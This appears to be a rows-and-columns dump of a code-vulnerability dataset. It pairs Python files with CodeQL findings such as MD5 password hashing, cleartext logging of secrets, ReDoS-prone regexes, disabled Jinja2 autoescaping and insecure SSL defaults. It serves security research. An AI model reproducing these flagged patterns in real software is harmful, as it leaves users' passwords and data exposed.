added
stringlengths
32
32
created
int64
1,236B
1,694B
id
stringlengths
40
40
int_score
int64
2
5
metadata
dict
score
float64
2.31
5.03
source
stringclasses
1 value
text
stringlengths
330
19.3k
num_lines
int64
16
648
avg_line_length
float64
15.5
59.3
max_line_length
int64
37
179
ast_depth
int64
8
38
length
int64
102
3.79k
lang
stringclasses
1 value
sast_codeql_findings
stringlengths
1.11k
276k
sast_codeql_findings_count
int64
1
33
sast_codeql_success
bool
1 class
sast_codeql_error
stringclasses
1 value
cwe_ids
listlengths
1
33
rule_ids
listlengths
1
33
confidences
listlengths
1
33
severities
listlengths
1
33
messages
listlengths
1
33
line_starts
listlengths
1
33
line_ends
listlengths
1
33
column_starts
listlengths
1
33
column_ends
listlengths
1
33
2024-11-18T19:28:54.697419+00:00
1,454,023,374,000
9ff1e1660dafed64312192989c7fb6028740a20b
3
{ "blob_id": "9ff1e1660dafed64312192989c7fb6028740a20b", "branch_name": "refs/heads/master", "committer_date": 1454023374000, "content_id": "0d4e1730c6c8ef9c39296959fb9baf61debbf6f6", "detected_licenses": [ "BSD-2-Clause" ], "directory_id": "7a69318d4b2720c2f61b6c9d1c23309671d1ac76", "extension": "p...
3.015625
stackv2
# Copyright (c) 2015, DjaoDjin inc. # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # # 1. Redistributions of source code must retain the above copyright notice, # this list of conditions and t...
120
35.12
77
16
1,070
python
[{"finding_id": "codeql_py/weak-sensitive-data-hashing_0420023d52f1076d_23b83779", "tool_name": "codeql", "rule_id": "py/weak-sensitive-data-hashing", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "[Sensitive data (password)](1) is used in a hashing algorithm (MD5) that is insec...
1
true
[ "CWE-327" ]
[ "py/weak-sensitive-data-hashing" ]
[ "HIGH" ]
[ "MEDIUM" ]
[ "[Sensitive data (password)](1) is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function.\n[Sensitive data (password)](2) is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensi...
[ 63 ]
[ null ]
[ 28 ]
[ 48 ]
2024-11-18T19:28:55.733195+00:00
1,604,729,457,000
09f2d8999df163a139010837ab4bf41644ed1caa
2
{ "blob_id": "09f2d8999df163a139010837ab4bf41644ed1caa", "branch_name": "refs/heads/main", "committer_date": 1604729457000, "content_id": "6725a611cc4261855555aa27284075a274a91a7a", "detected_licenses": [ "MIT" ], "directory_id": "5c92c902c3a2d893fc1e674cb5539efbfdb7b888", "extension": "py", "file...
2.390625
stackv2
#! /usr/bin/env python3 import pathlib import os import json import sys import getopt from time import sleep from votecheck import michigan def print_help(): print('Look up Michigan voters') print('zombie_votes.py --mi') print('zombie_votes.py --michigan') print('') def hunt_mi_zombies(): for f...
117
45.03
119
35
838
python
[{"finding_id": "codeql_py/clear-text-logging-sensitive-data_a6621460a4bee85e_1fea2361", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (private)](1) as clear text.\nTh...
1
true
[ "CWE-312" ]
[ "py/clear-text-logging-sensitive-data" ]
[ "HIGH" ]
[ "MEDIUM" ]
[ "This expression logs [sensitive data (private)](1) as clear text.\nThis expression logs [sensitive data (private)](2) as clear text." ]
[ 51 ]
[ 60 ]
[ 41 ]
[ 74 ]
2024-11-18T19:39:57.494393+00:00
1,493,255,357,000
1f13c006846aa4cea27b29c63f71a7c7df8d31f9
3
{ "blob_id": "1f13c006846aa4cea27b29c63f71a7c7df8d31f9", "branch_name": "refs/heads/master", "committer_date": 1493255357000, "content_id": "96be0ecca23e80fdb8c4c9e9161e45ee65a6d71f", "detected_licenses": [ "MIT" ], "directory_id": "c971407d6d5b2071f6ba156445fb271951d39648", "extension": "py", "fi...
2.65625
stackv2
from concurrent import futures import io import json import logging import socket import sys import threading class UnixDomainSocketRpc(object): def __init__(self, socket_path, executor=None): self.socket_path = socket_path self.decoder = json.JSONDecoder() self.executor = executor de...
215
31.91
92
17
1,654
python
[{"finding_id": "codeql_py/clear-text-logging-sensitive-data_2cb1009df60a9d8d_acf43000", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (secret)](1) as clear text.", "r...
1
true
[ "CWE-312" ]
[ "py/clear-text-logging-sensitive-data" ]
[ "HIGH" ]
[ "MEDIUM" ]
[ "This expression logs [sensitive data (secret)](1) as clear text." ]
[ 48 ]
[ null ]
[ 63 ]
[ 67 ]
2024-11-18T20:18:02.399649+00:00
1,550,615,489,000
a415acc93b816b33fe4133ae8c86fb98a2917815
3
{ "blob_id": "a415acc93b816b33fe4133ae8c86fb98a2917815", "branch_name": "refs/heads/master", "committer_date": 1550615489000, "content_id": "c7b0714ab8290b6b9169b3d99c3fa6f9ca1283ca", "detected_licenses": [ "MIT" ], "directory_id": "7186d66f2a2457170ef6396190e50dadae840a2c", "extension": "py", "fi...
3.3125
stackv2
from datetime import datetime as dt def receive_basic_iuput_data(Singal_Loss, Shock_Alert, Oxygen_Supply, Fever, Hypotension, Hypertension): ##Recevie data from input module, then analyze it using some judge functions to generate boolean result ##Boolean Parameters ##If paramter returns True, means it sho...
59
39.69
107
10
609
python
[{"finding_id": "codeql_py/clear-text-logging-sensitive-data_bcc8ee2b464896c3_c69a75ea", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (private)](1) as clear text.", "...
3
true
[ "CWE-312", "CWE-312", "CWE-312" ]
[ "py/clear-text-logging-sensitive-data", "py/clear-text-logging-sensitive-data", "py/clear-text-logging-sensitive-data" ]
[ "HIGH", "HIGH", "HIGH" ]
[ "MEDIUM", "MEDIUM", "MEDIUM" ]
[ "This expression logs [sensitive data (private)](1) as clear text.", "This expression logs [sensitive data (private)](1) as clear text.", "This expression logs [sensitive data (private)](1) as clear text." ]
[ 37, 44, 46 ]
[ null, null, null ]
[ 27, 27, 22 ]
[ 37, 36, 28 ]
2024-11-18T20:18:11.066262+00:00
1,537,250,556,000
5a2403ac8b9dc4d1587faa74aaa6c1ed639f2919
2
{ "blob_id": "5a2403ac8b9dc4d1587faa74aaa6c1ed639f2919", "branch_name": "refs/heads/master", "committer_date": 1537250556000, "content_id": "9fd0bebf1357b68c52569a0b03d11684f0dfdc72", "detected_licenses": [ "Apache-2.0" ], "directory_id": "2240b83758ff6d56190ee374092b453234a627d7", "extension": "py"...
2.4375
stackv2
import urllib.request import json import datetime import os import argparse import time import sys import jinja2 import shutil hash_log_path = "HA - Observed Instances.hlog" feed_log_dir = "." def get_HA_feed(): url = "https://www.hybrid-analysis.com/feed?json" dt_now = datetime.datetime.now().strftime('%b %...
184
38.67
138
27
1,571
python
[{"finding_id": "codeql_py/jinja2/autoescape-false_6cc5c01bd0862324_abfcdc1b", "tool_name": "codeql", "rule_id": "py/jinja2/autoescape-false", "finding_type": "problem", "severity": "medium", "confidence": "medium", "message": "Using jinja2 templates with autoescape=False can potentially allow XSS attacks.", "remediati...
1
true
[ "CWE-079" ]
[ "py/jinja2/autoescape-false" ]
[ "MEDIUM" ]
[ "MEDIUM" ]
[ "Using jinja2 templates with autoescape=False can potentially allow XSS attacks." ]
[ 168 ]
[ null ]
[ 35 ]
[ 76 ]
2024-11-18T20:18:19.318083+00:00
1,623,134,697,000
762ccd2b10722369fced614ec976e34d7366e282
3
{ "blob_id": "762ccd2b10722369fced614ec976e34d7366e282", "branch_name": "refs/heads/main", "committer_date": 1623134697000, "content_id": "66c40663fed11a681c120dc83c602826cd583bb8", "detected_licenses": [ "MIT" ], "directory_id": "fce6839410208718a411e88ce057ee29637cc9ac", "extension": "py", "file...
2.53125
stackv2
import json import os import re import sys # from itertools import chain from tuw_nlp.text.pipeline import CachedStanzaPipeline, CustomStanzaPipeline from tuw_nlp.text.utils import normalize_whitespace from tqdm import tqdm SEC_NUM_PATT = re.compile( r'^(?P<secnum>(?:II*\.|[1-9][0-9]?(\.[1-9][0-9]?)*[.\s]+)+)(?P...
121
29.69
91
20
900
python
[{"finding_id": "codeql_py/redos_63a23482edfe9068_7c6883a7", "tool_name": "codeql", "rule_id": "py/redos", "finding_type": "problem", "severity": "medium", "confidence": "high", "message": "This part of the regular expression may cause exponential backtracking on strings starting with '1' and containing many repetition...
1
true
[ "CWE-1333" ]
[ "py/redos" ]
[ "HIGH" ]
[ "MEDIUM" ]
[ "This part of the regular expression may cause exponential backtracking on strings starting with '1' and containing many repetitions of '.1'." ]
[ 13 ]
[ null ]
[ 39 ]
[ 55 ]
2024-11-18T20:18:35.627609+00:00
1,495,796,706,000
567b9e565480e8e400b5d6a5c7498107ea754634
3
{ "blob_id": "567b9e565480e8e400b5d6a5c7498107ea754634", "branch_name": "refs/heads/master", "committer_date": 1495796706000, "content_id": "70dfaed70c9109b80b920a187f9ea8d434378d8c", "detected_licenses": [ "MIT" ], "directory_id": "accf9b1734d60c4b57e16244c1f8fccba73d8747", "extension": "py", "fi...
3.3125
stackv2
import re from .mappings import lat2cir, bi2mono def clean(text): """ Clean text and convert everything to uppercase. """ text = text.upper() return re.sub(r'[~`!@#$%^&*()-=_+\{\}\[\]\\:\;\"\'\|\?\>\<\,\.\/QWXY]+', " ", text) def convert2cir(text): """ Convert Latin script to Cyrilic.""" for i, j ...
23
33.13
103
15
210
python
[{"finding_id": "codeql_py/overly-large-range_fa4c5cd569d0b2c4_d557c533", "tool_name": "codeql", "rule_id": "py/overly-large-range", "finding_type": "problem", "severity": "medium", "confidence": "high", "message": "Suspicious character range that is equivalent to \\[)*+,\\-.\\/0-9:;<=\\].", "remediation": "", "locatio...
1
true
[ "CWE-020" ]
[ "py/overly-large-range" ]
[ "HIGH" ]
[ "MEDIUM" ]
[ "Suspicious character range that is equivalent to \\[)*+,\\-.\\/0-9:;<=\\]." ]
[ 7 ]
[ null ]
[ 33 ]
[ 36 ]
2024-11-18T20:18:45.390446+00:00
1,502,467,714,000
5efca822e587f6167eb381030163ea8dd7230a5e
3
{ "blob_id": "5efca822e587f6167eb381030163ea8dd7230a5e", "branch_name": "refs/heads/master", "committer_date": 1502467714000, "content_id": "53d8085075e5fa55ffa40f44c8b7a6d01a7e560c", "detected_licenses": [ "MIT" ], "directory_id": "7bbe50a18dac0ee26eb3896bc958f5e5dcd5f029", "extension": "py", "fi...
2.953125
stackv2
##################################### # improve_person_dataset_cat # Input: prop_selection.txt # person_data.tsv # cat_assignment.json # actor-professions.txt # politician-professions.txt # scientist-professions.txt # sport-professions.txt # writer-professions.txt # category_blacklist.txt # countries...
256
30.19
130
21
2,118
python
[{"finding_id": "codeql_py/clear-text-storage-sensitive-data_5267864123ba9cba_2d3de1f1", "tool_name": "codeql", "rule_id": "py/clear-text-storage-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression stores [sensitive data (private)](1) as clear text.\n...
2
true
[ "CWE-312", "CWE-312" ]
[ "py/clear-text-storage-sensitive-data", "py/clear-text-storage-sensitive-data" ]
[ "HIGH", "HIGH" ]
[ "MEDIUM", "MEDIUM" ]
[ "This expression stores [sensitive data (private)](1) as clear text.\nThis expression stores [sensitive data (private)](2) as clear text.\nThis expression stores [sensitive data (private)](3) as clear text.\nThis expression stores [sensitive data (private)](1) as clear text.\nThis expression stores [sensitive data ...
[ 233, 237 ]
[ null, null ]
[ 17, 17 ]
[ 28, 42 ]
2024-11-18T20:18:46.295666+00:00
1,460,475,364,000
83dbc9322674d243a314deaa94e7308acb7c3ae5
3
{ "blob_id": "83dbc9322674d243a314deaa94e7308acb7c3ae5", "branch_name": "refs/heads/master", "committer_date": 1460475364000, "content_id": "6731a273076d9ee0cffda34ade846e7e9d1b7620", "detected_licenses": [ "Apache-2.0" ], "directory_id": "5952de4a17b61c7543eda4129ea43e5f920ec22e", "extension": "py"...
2.515625
stackv2
from uuid import getnode as get_mac import ssl import json import socket import time class ServerConnection(object): """ This class manages the connection to the door server. It automatically attempts to reconnect to the server every 10 seconds if the connection fails. """ # Connect to 192.16...
102
31.7
94
18
701
python
[{"finding_id": "codeql_py/insecure-default-protocol_1a2bd4bcf09e5898_c97c95d6", "tool_name": "codeql", "rule_id": "py/insecure-default-protocol", "finding_type": "problem", "severity": "medium", "confidence": "high", "message": "Call to deprecated method ssl.wrap_socket does not specify a protocol, which may result in...
1
true
[ "CWE-327" ]
[ "py/insecure-default-protocol" ]
[ "HIGH" ]
[ "MEDIUM" ]
[ "Call to deprecated method ssl.wrap_socket does not specify a protocol, which may result in an insecure default being used." ]
[ 29 ]
[ 35 ]
[ 29 ]
[ 45 ]
2024-11-18T20:29:34.281348+00:00
1,621,263,364,000
0db717a12ad7f2b6e6c7f8b12a956cae37a9342f
3
{ "blob_id": "0db717a12ad7f2b6e6c7f8b12a956cae37a9342f", "branch_name": "refs/heads/main", "committer_date": 1621263364000, "content_id": "8e7099024181bdd01cef107f154ef9088b6d3f22", "detected_licenses": [ "CC0-1.0" ], "directory_id": "30111ec37c11b5a770349f8bba996fa99358de35", "extension": "py", "...
2.796875
stackv2
# Imports import numpy as np import re import string import progressbar import logging logger = logging.getLogger(__name__) # Import spacy import spacy import it_core_news_sm nlp_it = it_core_news_sm.load() ############ # STOPWORDS ############ # Import list of stopwords from it_stop_words.py from it_stop_words imp...
113
28.16
123
14
856
python
[{"finding_id": "codeql_py/overly-large-range_a9b151f8fae20ffd_78627ef0", "tool_name": "codeql", "rule_id": "py/overly-large-range", "finding_type": "problem", "severity": "medium", "confidence": "high", "message": "Suspicious character range that overlaps with \\ufffd-\\ufffd in the same character class.", "remediatio...
4
true
[ "CWE-020", "CWE-020", "CWE-020", "CWE-020" ]
[ "py/overly-large-range", "py/overly-large-range", "py/overly-large-range", "py/overly-large-range" ]
[ "HIGH", "HIGH", "HIGH", "HIGH" ]
[ "MEDIUM", "MEDIUM", "MEDIUM", "MEDIUM" ]
[ "Suspicious character range that overlaps with \\ufffd-\\ufffd in the same character class.", "Suspicious character range that overlaps with \\ufffd-\\ufffd in the same character class.", "Suspicious character range that overlaps with \\ufffd-\\ufffd in the same character class.", "Suspicious character range ...
[ 47, 47, 47, 47 ]
[ null, null, null, null ]
[ 30, 33, 36, 45 ]
[ 34, 37, 40, 49 ]
2024-11-18T19:07:00.026427+00:00
1,689,347,157,000
d3b7671fdbcb4c470d654e5b6ba9c0c0666a5035
3
{ "blob_id": "d3b7671fdbcb4c470d654e5b6ba9c0c0666a5035", "branch_name": "refs/heads/master", "committer_date": 1689347157000, "content_id": "0ed4c01a4cfec4b9d692613265dab3556fe55a90", "detected_licenses": [ "MIT" ], "directory_id": "a752341e85c7ea1edbb362f69cf5c9e2aa71585f", "extension": "py", "fi...
2.546875
stackv2
import datetime import json import logging import os import tempfile from pathlib import Path import morph_kgc from rdflib import Graph from ..utils import constants class DataGraph: def __init__(self): self.g = Graph() def somef_data_to_graph(self, somef_data): """ Method that retu...
187
50.5
134
29
1,786
python
[{"finding_id": "codeql_py/incomplete-url-substring-sanitization_b1fd6fb7d4162ca4_77656245", "tool_name": "codeql", "rule_id": "py/incomplete-url-substring-sanitization", "finding_type": "problem", "severity": "medium", "confidence": "high", "message": "The string [api.github.com](1) may be at an arbitrary position in ...
1
true
[ "CWE-020" ]
[ "py/incomplete-url-substring-sanitization" ]
[ "HIGH" ]
[ "MEDIUM" ]
[ "The string [api.github.com](1) may be at an arbitrary position in the sanitized URL." ]
[ 89 ]
[ 90 ]
[ 83 ]
[ 75 ]
2024-11-18T19:07:19.493277+00:00
1,631,606,053,000
3f003ee566e617defd80a100ee6b44a49d3c4974
3
{ "blob_id": "3f003ee566e617defd80a100ee6b44a49d3c4974", "branch_name": "refs/heads/main", "committer_date": 1631606053000, "content_id": "8e52549883fd0be379413f410dd38555ec9f1371", "detected_licenses": [ "Apache-2.0" ], "directory_id": "f6ed7bc808f5536bc77166fe5c3571e5c028f308", "extension": "py", ...
2.546875
stackv2
# # Copyright (c) 2016, deepsense.io # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in w...
144
29.99
100
18
1,050
python
[{"finding_id": "codeql_py/redos_7899250afeaaf3ab_a569b563", "tool_name": "codeql", "rule_id": "py/redos", "finding_type": "problem", "severity": "medium", "confidence": "high", "message": "This part of the regular expression may cause exponential backtracking on strings starting with '\"' and containing many repetitio...
2
true
[ "CWE-1333", "CWE-1333" ]
[ "py/redos", "py/redos" ]
[ "HIGH", "HIGH" ]
[ "MEDIUM", "MEDIUM" ]
[ "This part of the regular expression may cause exponential backtracking on strings starting with '\"' and containing many repetitions of '\\\\\\\\'.", "This part of the regular expression may cause exponential backtracking on strings starting with '\"' and containing many repetitions of '\\\\\\\\'." ]
[ 39, 42 ]
[ null, null ]
[ 28, 28 ]
[ 48, 45 ]
2024-11-18T19:07:23.270624+00:00
1,611,808,229,000
4a577e33d832e1173b37d99934bd416cd621573e
4
{ "blob_id": "4a577e33d832e1173b37d99934bd416cd621573e", "branch_name": "refs/heads/main", "committer_date": 1611808229000, "content_id": "7cda9d1a0ade103aa0b78cad9b4b1b25cdbef4e6", "detected_licenses": [ "MIT" ], "directory_id": "67a60a7bce36691ab5f2280a27cd70d57a1cdb69", "extension": "py", "file...
4.28125
stackv2
# Some dictionary methods # copy() Returns a copy of the dictionary # fromkeys() Returns a dictionary with the specified keys and value # popitem() Removes the last inserted key-value pair (pop() removes a random item) # setdefault() Returns the value of the specified key. # If the key is not foun...
43
31.77
109
8
390
python
[{"finding_id": "codeql_py/clear-text-logging-sensitive-data_f9745f27d6466f93_147f7dc3", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (private)](1) as clear text.", "...
6
true
[ "CWE-312", "CWE-312", "CWE-312", "CWE-312", "CWE-312", "CWE-312" ]
[ "py/clear-text-logging-sensitive-data", "py/clear-text-logging-sensitive-data", "py/clear-text-logging-sensitive-data", "py/clear-text-logging-sensitive-data", "py/clear-text-logging-sensitive-data", "py/clear-text-logging-sensitive-data" ]
[ "HIGH", "HIGH", "HIGH", "HIGH", "HIGH", "HIGH" ]
[ "MEDIUM", "MEDIUM", "MEDIUM", "MEDIUM", "MEDIUM", "MEDIUM" ]
[ "This expression logs [sensitive data (private)](1) as clear text.", "This expression logs [sensitive data (private)](1) as clear text.\nThis expression logs [sensitive data (private)](2) as clear text.", "This expression logs [sensitive data (private)](1) as clear text.", "This expression logs [sensitive dat...
[ 11, 16, 30, 32, 37, 43 ]
[ null, null, null, null, null, null ]
[ 7, 7, 7, 7, 7, 7 ]
[ 24, 25, 24, 24, 24, 24 ]
2024-11-18T19:07:26.191084+00:00
1,571,233,225,000
cec9cc94352cc75fc6cd99ff0cc0e0149bb6bca6
3
{ "blob_id": "cec9cc94352cc75fc6cd99ff0cc0e0149bb6bca6", "branch_name": "refs/heads/master", "committer_date": 1571233225000, "content_id": "25bfc1d24c72c1a397585c9e659869212a85aa71", "detected_licenses": [ "MIT" ], "directory_id": "41e7fe067bc1689b9673a25c11420a3aa3f56f19", "extension": "py", "fi...
2.75
stackv2
import datetime import requests from flask import Flask, render_template from flask_caching import Cache from htmlmin.minify import html_minify app = Flask(__name__) cache = Cache(config={'CACHE_TYPE': 'simple'}) cache.init_app(app) @app.route('/') @app.route('/index') @cache.cached(timeout=300) # 1800 seconds ==...
67
27.37
163
15
451
python
[{"finding_id": "codeql_py/clear-text-logging-sensitive-data_894c4a528a2094cb_efa7cf8f", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (private)](1) as clear text.\nTh...
1
true
[ "CWE-312" ]
[ "py/clear-text-logging-sensitive-data" ]
[ "HIGH" ]
[ "MEDIUM" ]
[ "This expression logs [sensitive data (private)](1) as clear text.\nThis expression logs [sensitive data (private)](2) as clear text." ]
[ 43 ]
[ null ]
[ 11 ]
[ 20 ]
2024-11-18T19:07:38.716246+00:00
1,635,632,510,000
0cd897dafe28ead6561c243c0cd58a7dc6afebb9
3
{ "blob_id": "0cd897dafe28ead6561c243c0cd58a7dc6afebb9", "branch_name": "refs/heads/master", "committer_date": 1635632510000, "content_id": "bf3280f57daead8f34aaa290ac89cc08113f05e4", "detected_licenses": [ "MIT" ], "directory_id": "37eb4737e9aed842a2f5aa6e5c4143cdff5018af", "extension": "py", "fi...
2.6875
stackv2
import bisect from datetime import datetime, timedelta from typing import Dict, List, Optional from zoneinfo import ZoneInfo import matplotlib.pyplot as plt from matplotlib.axes import Axes from matplotlib.lines import Line2D from skyfield.constants import DEG2RAD from base.classical import ZODIAC from base.data impo...
190
31.93
99
18
1,484
python
[{"finding_id": "codeql_py/clear-text-logging-sensitive-data_a5efaa028a2f0282_a59f9baa", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (private)](1) as clear text.\nTh...
1
true
[ "CWE-312" ]
[ "py/clear-text-logging-sensitive-data" ]
[ "HIGH" ]
[ "MEDIUM" ]
[ "This expression logs [sensitive data (private)](1) as clear text.\nThis expression logs [sensitive data (private)](2) as clear text." ]
[ 101 ]
[ null ]
[ 15 ]
[ 34 ]
2024-11-18T19:07:58.127458+00:00
1,588,524,975,000
5cb195003954519e3034d490f4ab5db3d2108e80
3
{ "blob_id": "5cb195003954519e3034d490f4ab5db3d2108e80", "branch_name": "refs/heads/master", "committer_date": 1588524975000, "content_id": "4de75a2d43799f09a7f9078a6013d7414f7736e7", "detected_licenses": [ "MIT" ], "directory_id": "57387969b4a3f2da22e6aa0513e18f47e41d74fe", "extension": "py", "fi...
3.4375
stackv2
#!/usr/bin/env python3 import argparse import random parser = argparse.ArgumentParser() parser.add_argument("language", help="language of the names") parser.add_argument("--sex", "-s", choices=['female', 'male'], help="sex of names") parser.add_argument("--count", "-c", type=int, default=100, help="number of names to ...
27
29.96
93
11
207
python
[{"finding_id": "codeql_py/clear-text-logging-sensitive-data_a3c60079c92f2cbb_3cc3eb36", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (private)](1) as clear text.", "...
1
true
[ "CWE-312" ]
[ "py/clear-text-logging-sensitive-data" ]
[ "HIGH" ]
[ "MEDIUM" ]
[ "This expression logs [sensitive data (private)](1) as clear text." ]
[ 12 ]
[ null ]
[ 7 ]
[ 68 ]
2024-11-18T19:08:00.007550+00:00
1,607,510,793,000
b583d46e64532a32b12bb9fd03911ea4a175ab25
3
{ "blob_id": "b583d46e64532a32b12bb9fd03911ea4a175ab25", "branch_name": "refs/heads/main", "committer_date": 1607510793000, "content_id": "25687cd2856d67fa3506a3dd0ec7f79764ec5a48", "detected_licenses": [ "MIT" ], "directory_id": "9c4e7f15ff127683d50674212ce06a8ded6b6724", "extension": "py", "file...
3.40625
stackv2
import re charMatch = re.compile('[a-z]|[A-Z]') validPasswords = 0 invalidPasswords = 0 with open("passwords.txt") as f: for line in f: minimum = 0 maximum = 0 numString = '' charactermatch = '' password = '' isPassword = False for char in line: ...
57
30.12
99
15
391
python
[{"finding_id": "codeql_py/clear-text-logging-sensitive-data_d6ca52aaf533fe34_96b4edef", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (password)](1) as clear text.\nT...
1
true
[ "CWE-312" ]
[ "py/clear-text-logging-sensitive-data" ]
[ "HIGH" ]
[ "MEDIUM" ]
[ "This expression logs [sensitive data (password)](1) as clear text.\nThis expression logs [sensitive data (password)](2) as clear text.\nThis expression logs [sensitive data (password)](3) as clear text." ]
[ 57 ]
[ null ]
[ 7 ]
[ 21 ]
2024-11-18T19:18:20.460846+00:00
1,602,450,062,000
216db57b529aab17dee9042d73982d16757e48ab
3
{ "blob_id": "216db57b529aab17dee9042d73982d16757e48ab", "branch_name": "refs/heads/master", "committer_date": 1602450062000, "content_id": "070cff24c2671ccda5316dcc9058074663bdce4e", "detected_licenses": [ "MIT" ], "directory_id": "8f577b79b837ab67b29fe0528e5dcd7b238ce019", "extension": "py", "fi...
2.8125
stackv2
"""This module provides objects for managing docker mount instances.""" from contextlib import contextmanager from tempfile import _TemporaryFileWrapper as TemporaryFile from tempfile import NamedTemporaryFile from typing import Any, Dict, Optional from docker.models.volumes import Volume as DockerVolume from docker....
119
32.56
99
13
833
python
[{"finding_id": "codeql_py/jinja2/autoescape-false_a49464f04ae7b9a2_f1e5ee69", "tool_name": "codeql", "rule_id": "py/jinja2/autoescape-false", "finding_type": "problem", "severity": "medium", "confidence": "medium", "message": "Using jinja2 templates with autoescape=False can potentially allow XSS attacks.", "remediati...
1
true
[ "CWE-079" ]
[ "py/jinja2/autoescape-false" ]
[ "MEDIUM" ]
[ "MEDIUM" ]
[ "Using jinja2 templates with autoescape=False can potentially allow XSS attacks." ]
[ 66 ]
[ null ]
[ 15 ]
[ 99 ]
2024-11-18T19:18:26.860401+00:00
1,493,710,838,000
e3dc284c23024460e563078f66315a5041a55102
3
{ "blob_id": "e3dc284c23024460e563078f66315a5041a55102", "branch_name": "refs/heads/master", "committer_date": 1493710838000, "content_id": "96c6c60086843298768eef7ae72196fecd3e8b98", "detected_licenses": [ "MIT" ], "directory_id": "f2fea666ffe0b29735e2b76cd6c7ddc458db3e29", "extension": "py", "fi...
2.65625
stackv2
# -*- coding: utf-8-*- import os import re from getpass import getpass import yaml import shellapath def main(): p_shella = open(shellapath.config("profile.yml"), "a") print("*******************************************************") print("* SHELLA - MODULES CONFIGURATION TOOL *") ...
102
34.25
96
38
983
python
[{"finding_id": "codeql_py/clear-text-storage-sensitive-data_6baa7dc51772d018_aca3d6e7", "tool_name": "codeql", "rule_id": "py/clear-text-storage-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression stores [sensitive data (password)](1) as clear text.\...
3
true
[ "CWE-312", "CWE-312", "CWE-312" ]
[ "py/clear-text-storage-sensitive-data", "py/clear-text-storage-sensitive-data", "py/clear-text-storage-sensitive-data" ]
[ "HIGH", "HIGH", "HIGH" ]
[ "MEDIUM", "MEDIUM", "MEDIUM" ]
[ "This expression stores [sensitive data (password)](1) as clear text.\nThis expression stores [sensitive data (password)](2) as clear text.\nThis expression stores [sensitive data (password)](3) as clear text.", "This expression stores [sensitive data (secret)](1) as clear text.\nThis expression stores [sensitive...
[ 38, 59, 89 ]
[ 41, 61, 94 ]
[ 18, 18, 18 ]
[ 57, 53, 65 ]
2024-11-18T19:18:57.244543+00:00
1,519,066,323,000
6f5a29730b24d0f1cc8fafcc79ebed217ef2360a
3
{ "blob_id": "6f5a29730b24d0f1cc8fafcc79ebed217ef2360a", "branch_name": "refs/heads/master", "committer_date": 1519066323000, "content_id": "3606b8a08ece249a2b071c7b4a7c3b237e297d69", "detected_licenses": [ "MIT" ], "directory_id": "782626a4fecb7888b582ecbae8b84e28bf48e8a7", "extension": "py", "fi...
2.859375
stackv2
from flask import Flask, jsonify, request from flask import abort import pbkdf2helper from pycra import create_challenge, auth_check app = Flask(__name__) # Simple Flask App with Challenge-Response Authentication (PBKDF2 hashed Passwords stored) class User(object): """ My Test User Model """ def _...
116
22.75
105
13
672
python
[{"finding_id": "codeql_py/clear-text-logging-sensitive-data_ceef90fb7a93b17f_7b11323d", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (password)](1) as clear text.\nT...
1
true
[ "CWE-312" ]
[ "py/clear-text-logging-sensitive-data" ]
[ "HIGH" ]
[ "MEDIUM" ]
[ "This expression logs [sensitive data (password)](1) as clear text.\nThis expression logs [sensitive data (password)](2) as clear text." ]
[ 115 ]
[ null ]
[ 11 ]
[ 66 ]
2024-11-18T19:19:09.058478+00:00
1,692,885,211,000
77e9c6063ad8af33bb121fb06981a55f55d94eb5
2
{ "blob_id": "77e9c6063ad8af33bb121fb06981a55f55d94eb5", "branch_name": "refs/heads/master", "committer_date": 1692885211000, "content_id": "9f020f90cfb435c6ea0215cc628f6514b43077d0", "detected_licenses": [ "MIT" ], "directory_id": "b43e0384ec4bfacec2571a2bb41ce563267db449", "extension": "py", "fi...
2.328125
stackv2
import os from hashlib import sha256 import requests from fastapi.responses import JSONResponse from jesse.services.env import ENV_VALUES import jesse.helpers as jh def password_to_token(password: str) -> JSONResponse: if password != ENV_VALUES['PASSWORD']: return unauthorized_response() auth_token =...
40
24.2
82
14
232
python
[{"finding_id": "codeql_py/weak-sensitive-data-hashing_cf1cc33ce7da4f36_666ecae2", "tool_name": "codeql", "rule_id": "py/weak-sensitive-data-hashing", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "[Sensitive data (password)](1) is used in a hashing algorithm (SHA256) that is in...
2
true
[ "CWE-327", "CWE-327" ]
[ "py/weak-sensitive-data-hashing", "py/weak-sensitive-data-hashing" ]
[ "HIGH", "HIGH" ]
[ "MEDIUM", "MEDIUM" ]
[ "[Sensitive data (password)](1) is used in a hashing algorithm (SHA256) that is insecure for password hashing, since it is not a computationally expensive hash function.", "[Sensitive data (password)](1) is used in a hashing algorithm (SHA256) that is insecure for password hashing, since it is not a computational...
[ 13, 21 ]
[ null, null ]
[ 25, 32 ]
[ 49, 70 ]
